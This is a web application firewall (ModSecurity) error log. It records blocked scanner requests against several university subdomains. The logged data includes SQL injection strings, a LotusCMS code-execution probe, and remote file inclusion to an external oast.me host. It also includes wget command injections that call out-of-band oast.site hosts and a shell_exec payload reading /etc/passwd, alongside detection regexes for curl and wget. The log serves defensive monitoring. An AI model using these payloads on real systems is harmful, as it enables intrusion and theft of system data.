[Tue Aug 29 11:30:29.375272 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAPiBfMAAAAB"]
[Tue Aug 29 11:30:29.390776 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAPDnwYAAAAP"]
[Tue Aug 29 11:30:29.391779 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAANh1q0AAAAA"]
[Tue Aug 29 11:30:29.395308 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAOH4TQAAAAH"]
[Tue Aug 29 11:30:30.303694 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAAOKNnsAAAAK"]
[Tue Aug 29 11:30:30.426628 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPmhLMAAAAV"]
[Tue Aug 29 11:30:30.428443 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAOH4TYAAAAH"]
[Tue Aug 29 11:30:30.431777 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPENdMAAAAQ"]
[Tue Aug 29 11:30:30.440350 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPPSvkAAAAd"]
[Tue Aug 29 11:30:30.444864 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPMl-4AAAAY"]
[Tue Aug 29 11:30:30.508299 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAPDnwoAAAAP"]
[Tue Aug 29 11:30:30.513196 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAOIvUgAAAAM"]
[Tue Aug 29 11:30:30.515263 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPmhLQAAAAV"]
[Tue Aug 29 11:30:30.535406 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAANjpyYAAAAT"]
[Tue Aug 29 11:30:31.363139 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAAPDnw0AAAAP"]
[Tue Aug 29 11:30:31.367992 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10Z8Co-f0AAAOM4WYAAAAU"]
[Tue Aug 29 11:30:31.389681 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10Z8Co-f0AAANh1rIAAAAA"]
[Tue Aug 29 11:30:32.621516 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10aMCo-f0AAAPXAl0AAAAi"]
[Tue Aug 29 11:30:32.644292 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOH4T4AAAAH"]
[Tue Aug 29 11:30:32.663924 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOH4T8AAAAH"]
[Tue Aug 29 11:30:32.665243 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPDnxEAAAAP"]
[Tue Aug 29 11:30:32.677491 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOKNoMAAAAK"]
[Tue Aug 29 11:30:32.705523 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOOuVQAAAAW"]
[Tue Aug 29 11:30:33.440098 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOOuVkAAAAW"]
[Tue Aug 29 11:30:33.462625 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPpWcUAAAAI"]
[Tue Aug 29 11:30:33.480471 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOM4W4AAAAU"]
[Tue Aug 29 11:30:33.584390 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPDnxcAAAAP"]
[Tue Aug 29 11:30:33.645417 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10acCo-f0AAAPDnxoAAAAP"]
[Tue Aug 29 11:30:33.656394 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPv-EIAAAAM"]
[Tue Aug 29 11:30:34.326910 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg38om3ff863t57.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAANh1rgAAAAA"]
[Tue Aug 29 11:30:34.333153 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPpWccAAAAI"]
[Tue Aug 29 11:30:34.338998 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPpWccAAAAI"]
[Tue Aug 29 11:30:34.368604 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg6oudie463d6ok.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPDnxwAAAAP"]
[Tue Aug 29 11:30:34.369498 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPv-EQAAAAM"]
[Tue Aug 29 11:30:34.397558 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10asCo-f0AAAPOhY0AAAAa"]
[Tue Aug 29 11:30:34.405083 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPXAmYAAAAi"]
[Tue Aug 29 11:30:34.409813 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPv-EUAAAAM"]
